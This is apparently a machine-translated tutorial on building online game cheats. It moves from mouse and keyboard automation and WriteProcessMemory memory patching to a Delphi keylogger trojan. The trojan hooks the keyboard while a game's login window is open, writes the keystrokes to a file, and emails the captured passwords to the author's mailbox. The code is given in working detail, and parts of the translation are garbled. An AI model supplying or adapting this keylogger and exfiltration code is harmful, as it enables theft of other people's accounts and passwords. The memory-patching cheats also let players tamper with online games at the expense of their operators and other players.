Plug-ins are divided into the following categories (depending on the difficulty of making ): 1. Action, the so-called action, refers to the use of APIs to send commands to Windows or APIs to control the mouse, keyboard, and so on, so that the players in the game can flow or attack, this is the earliest plug-in for stone tools. 2. Local modification. This plug-in is no different from some traditional game modifiers. in programming, you only need to know the memory address and master the API, the difficulty lies in finding the address codes and finding the addresses usually requires the help of other people's tools. Some games also have dual-code verification, which is difficult to find. This plug-in requires the ability to understand and apply memory addresses. 3. The purpose of this plug-in is to help the plug-in maker steal the user's password. It is difficult to do this plug-in. It can be completed only by using the hook or keyboard monitoring technology, the principle is to first intercept the user's account or password and then send it to the specified mailbox. 4. Acceleration. This plug-in can speed up the game 5. encapsulation. This plug-in is a difficult plug-in that requires strong programming skills. The principle is to intercept packets, modify the packets, and then forward the packets. This plug-in is suitable for most online games. WPE and some plug-ins of online games are written in this way. To compile such plug-ins, apihook technology and Winsock technology are required. Among these plug-ins, VC and other underlying programming tools that support better implementation. Plug-ins (from shortest to deep ): First, let's talk about action-based plug-ins. This is the simplest one. I remember when I was still in the Stone Age, I saw someone else hanging on a software (plug-in) character, so I could walk around four times (I Didn't Know What plug-ins are going on yet ), so I found this kind of software to study it (and then I heard someone say this is plug-in) and found that this kind of stuff is actually not difficult to implement, as a matter of fact, the walking of a character is nothing more than clicking the mouse in a different place. After reading it, I was impulsive to implement this function. Then I ran to msdn to read some information, to implement these functions, you only need a few simple API functions: 1. First, we need to know the current mouse position (to restore the current mouse position), so we need to use the API function getcursorpos, which is used as follows:
Bool getcursorpos (lppoint // address of structure for cursor position ); 2. We need to use the setcursorpos function to move the mouse position to the place where the mouse is to be reached. The usage of this function is as follows:
Bool setcursorpos ( Int X, // horizontal position
Int y // vertical position
);
3. Simulate the mouse push and release actions. We need to use the mouse_event function for implementation. The following is a useful method: Void mouse_event ( DWORD dwflags, // flags specifying various motion/click variants
DWORD dx, // horizontal mouse position or position change
DWORD dy, // vertical mouse position or position change
DWORD dwdata, // amount of Wheel Movement
DWORD dwextrainfo // 32 bits of application-defined information
);
There are many available events in its dwflags, such as moving mouseeventf_move, left-clicking mouseeventf_leftdown, and left-clicking mouseeventf_leftup. For details, check msdn ~~~~~ Well, with the previous knowledge, we can see how the removal of characters is achieved: Getcursorpos (point );
Setcursorpos (ranpoint (80, windowx), ranpoint (80, windowy); // ranpoint is a self-made random coordinate function.
Mouse_event (mouseeventf_leftdown, 0, 0, 0 );
Mouse_event (mouseeventf_leftup, 0, 0, 0 );
Setcursorpos (point. X, point. y ); After reading the above Code, do you think it is very easy to walk a character ~~, For example, there are many other good things that can be implemented using this technique. Next, let's take a look at the automatic attack practices in the game (which must support the shortcut keys for attacks in the game). The truth is the same, the APIs are different ~~~, The keybd_event function is used as follows: Void keybd_event ( Byte bvk, // virtual-key code
Byte bscan, // hardware scan code
DWORD dwflags, // flags specifying various function options
DWORD dwextrainfo // additional data associated with keystroke
);
We also need to know that the scan Code cannot be used directly. Use the mapvirtualkey function to convert the key value into a scan code. The usage of mapvirtualkey is as follows:
Uint mapvirtualkey ( Uint ucode, // virtual-key code or scan code
Uint umaptype // translation to perform );
Well, the shortcut key is Ctrl + A. Let's see how the actual code is written: Keybd_event (vk_control, mapvirtualkey (vk_control, 0), 0, 0 );
Keybd_event (65, mapvirtualkey );
Keybd_event (65, mapvirtualkey (65,0), keyeventf_keyup, 0 );
Keybd_event (vk_control, mapvirtualkey (vk_control, 0), keyeventf_keyup, 0 ); First, simulate pressing the ctrl key, then simulate pressing the key, then simulate releasing the key, and finally open the ctrl key, this is a cycle to simulate pressing the shortcut key. The entire production process of locally modified plug-ins is decomposed in detail.
As far as I know, the most typical application of locally modified plug-ins is in the "genie" game, because I was in the test phase nearly a year ago ("genie" is still in the test phase ), after reading the Data Processing Method of the game, I found that the information it sent to the server exists in the memory (the first feeling after reading is: there is not much difference between modifying this type of game and modifying a single-host version. In other words, you can modify the memory address before submitting information to the server ), at that time, I found the address and modified the memory address. As a result, I modified the address according to my idea. After the system automatically submitted the address, it was indeed successful ~~~~~, Later, the "Genie" was changed to dual-address verification and memory verification. Here I will not talk nonsense ~~~~, OK. Let's take a look at how these plug-ins are made: Before doing plug-ins, we need to have a specific understanding of Windows Memory, and here we refer to the memory refers to the memory offset of the system, that is, relative memory, but if we want to modify it, we need to understand several windows APIs. OK, the following example shows how to create a plug-in and how to use APIs. (to ensure the normal operation of online games, I will not explain in detail how to find the memory address ):
1. First, we need to use findwindow to know the handle of the game window, because we need to use it to know the ID of the process in which the game is running. The usage of findwindow is as follows:
Hwnd findwindow ( Maid, // pointer to class name Lptstr lpwindowname // pointer to window name
);
2. getwindowthreadprocessid is used to obtain the process ID corresponding to the game window. The function usage is as follows:
DWORD getwindowthreadprocessid ( Hwnd, // handle of window
Lpdword lpdwprocessid // address of variable for process identifier
);
3. After obtaining the game process ID, the next thing to do is to open the process with the highest permission. The specific usage of the function OpenProcess is as follows:
Handle OpenProcess ( DWORD dwdesiredaccess, // access flag Bool binherithandle, // handle inheritance flag
DWORD dwprocessid // process identifier
);
In dwdesiredaccess, the access method is set. It has many permissions. here we can use process_all_access to open the process. For other methods, we can check msdn.
4. After opening the process, we can use the function to perform operations on the memory. Here we only need to use writeprocessmemory to write data to the memory address (other operations such as readprocessmemory, etc, I will not describe it here). Let's take a look at the usage of writeprocessmemory: Bool writeprocessmemory ( Handle hprocess, // handle to process whose memory is written
Lpvoid lpbaseaddress, // address to start writing
Lpvoid lpbuffer, // pointer to buffer to write data
DWORD nsize, // number of bytes to write
Lpdword lpnumberofbyteswritten // actual number of bytes written
);
5. Use closehandle to close the process handle.
This is part of the implementation method of this type of game plug-ins. Well, with this method, we have a rational understanding. Let's look at the actual examples to improve our perceptual knowledge, the following is the plug-in code of XX game. Let's take a look at the method above: Const
Resourceoffset: DWORD = $004219f4;
Resource: DWORD = 3113226621;
Resourceoffset1: DWORD = $004219f8;
Resource1: DWORD = 1940000000;
Resourceoffset2: DWORD = $0043fa50;
Resource2: DWORD = 1280185;
Resourceoffset3: DWORD = $0043fa54;
Resoure3: DWORD = 3163064576;
Resourceoffset4: DWORD = $0043fa58;
Resource4: DWORD = 2298478592;
VaR
HW: hwnd;
PID: DWORD;
H: thandle;
TT: Cardinal;
Begin
HW: = findwindow ('XX', nil );
If hW = 0 then Exit;
Getwindowthreadprocessid (HW, @ PID );
H: = OpenProcess (process_all_access, false, pid );
If H = 0 then
Exit;
If flatcheckbox1.checked = true then
Begin
Writeprocessmemory (H, pointer (resourceoffset), @ resource, sizeof (resource), TT );
Writeprocessmemory (H, pointer (resourceoffset1), @ resource1, sizeof (resource1), TT );
End;
If flatcheckbox2.checked = true then
Begin
Writeprocessmemory (H, pointer (resourceoffset2), @ resource2, sizeof (resource2), TT ); Writeprocessmemory (H, pointer (resourceoffset3), @ resourw1, sizeof (resoure3), TT );
Writeprocessmemory (H, pointer (resourceoffset4), @ resource4, sizeof (resource4), TT );
End;
Messagebeep (0 );
Closehandle (h );
Close;
This game uses multiple addresses to verify the data to be submitted. Therefore, it is not difficult to create plug-ins for such games. The most difficult thing is to find these addresses. Previously introduced action styles. Locally modified plug-ins are real plug-ins. The Trojan plug-ins to be introduced in this article may be mostly like Trojans, attackers can steal others' game accounts and passwords. Because such plug-ins exist on the network. There are many ways to implement such plug-ins (such as hook, keyboard monitoring, and other technologies ), because the Hook Technology has high technical requirements for programmers and requires a dynamic link library for practical applications, I will use the keyboard monitoring technology to create such Trojans. Keyboard Compaction Technology only supports the background keyboard monitoring by using an .exe file. This program is suitable for implementation. Before developing a program, we must understand the program's ideas:
1. First, we know the name of the logon window you want to record the game.
2. Check whether the logon window appears.
3. If the logon window appears, record the keyboard.
4. When the window is closed, send the record information to the email address of the program designer.
First, I will not analyze it in detail, because you know more about what game you are playing and what the login window name is. Starting from the second point, we will start the implementation of such plug-ins:
So how can we determine whether the logon window appears? In fact, this is very simple. We can easily implement it using the findwindow function: Hwnd findwindow ( Maid, // pointer to class name
Lptstr lpwindowname // pointer to window name
);
In actual program implementation, we need to find the 'xx' window and use findwindow (nil, 'xx'). If the return value is greater than 0, it indicates that the window has already appeared, then we can record the keyboard information.
First, we use setwindowshookex to set monitoring logs. The usage of this function is as follows:
Hhook setwindowshookex ( Int idhook, // type of hook to install
Hookproc lpfn, // address of hook procedure Hinstance hmod, // handle of application instance
DWORD dwthreadid // identity of thread to install hook
);
In our program, we want to implement hookproc by writing a function. In hinstance, we can directly use the hinstance of this program, the specific implementation method is as follows:
Hhook: = setwindowshookex (wh_journalrecord, hookproc, hinstance, 0 );
The functions in hookproc are a little more complicated:
Function hookproc (icode: integer; wparam: wparam; lparam: lparam): lresult; stdcall; Begin
If findedtitle then // After the window is found
Begin
If (peventmsg (lparam) ^. Message = wm_keydown) Then // The message is equivalent to pressing on the keyboard
Hookkey: = hookkey + form1.keyhookresult (peventmsg (lparam) ^. paraml, peventmsg (lparam) ^. paramh); // use keyhookresult (custom function, the main function is to convert the intercepted message parameter to the key name. I will include the conversion function at the end of the article) to convert the message.
If length (hookkey)> 0 then // if you get the key name
Begin
Write (hookkeyfile, hookkey); // write the key name to a text file Hookkey: = '';
End;
End;
End;
The above is the whole process of recording the keyboard. It's easy. Do not forget to release it after recording. unhookwindowshookex (hhook), and hhook is the handle returned after setwindowshookex is created.
We have obtained the keyboard record, so now we only need to send the recorded information back, and we will do a lot of work. It is not difficult to send other messages. You only need to read the records from the text file and use the email component that comes with Delphi to send the records. The Code is as follows:
Assignfile(readfile,'hook.txt '); // open the hook.txt text file.
Reset (readfile); // set to read mode Try
While not EOF (readfile) Do // when the end of the file is not read
Begin
Readln (readfile, S, J); // read the file row
Body: = body + S;
End;
Finally
Closefile (readfile); // close the file
End;
Nmsmtp1.encodetype: = uumime; // sets the encoding.
Nmsmtp1.postmessage. attachments. Text: = ''; // set the attachment
Nmsmtp1.postmessage. fromaddress: = 'xxx @ xxx.com '; // you can specify the source email address.
Nmsmtp1.postmessage. toaddress. Text: = 'xxx @ xxx.com ';/set the target email address Nmsmtp1.postmessage. Body. Text: = 'Password' + ''+ body; // you can specify the email content.
Nmsmtp1.postmessage. Subject: = 'Password'; // you can specify the mail title.
Nmsmtp1.sendmail; // send an email
All functions of this program have been implemented. Compile and try again. |
